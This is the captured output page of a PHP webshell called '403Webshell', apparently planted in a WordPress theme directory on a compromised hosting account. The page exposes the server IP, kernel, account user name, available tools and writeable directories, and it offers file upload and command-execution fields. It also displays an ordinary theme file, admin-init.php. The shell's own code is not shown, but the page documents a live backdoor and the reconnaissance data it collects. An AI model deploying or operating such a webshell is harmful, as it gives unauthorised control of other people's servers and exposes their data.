403Webshell
Server IP : 213.186.33.4  /  Your IP : 216.73.216.222
Web Server : Apache
System : Linux webm005.cluster103.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : karinebmkh ( 644538)
PHP Version : 8.4.22
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/karinebmkh/www2/wp-content/themes/novablog/admin-panel/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/karinebmkh/www2/wp-content/themes/novablog/admin-panel/admin-init.php
<?php
    if ( file_exists( get_template_directory() . '/admin-panel/options-init.php' ) ) {
        require_once get_template_directory() . '/admin-panel/options-init.php';
    }
function novablog_removeDemoModeLink() {
    if ( class_exists('ReduxFrameworkPlugin') ) {
        remove_filter( 'plugin_row_meta', array( ReduxFrameworkPlugin::get_instance(), 'plugin_metalinks'), null, 2 );
    }
    if ( class_exists('ReduxFrameworkPlugin') ) {
        remove_action('admin_notices', array( ReduxFrameworkPlugin::get_instance(), 'admin_notices' ) );    
		add_action( 'admin_menu', 'novablog_remove_redux_menu',12 );
function novablog_remove_redux_menu() {
    remove_submenu_page('tools.php','redux-about');
}
    }
}
add_action('init', 'novablog_removeDemoModeLink');
add_action('admin_init', 'novablog_override_redux_message', 30);

function novablog_override_redux_message() {
    update_option( 'ReduxFrameworkPlugin_ACTIVATED_NOTICES', '');
}

Youez - 2016 - github.com/yon3zu
LinuXploit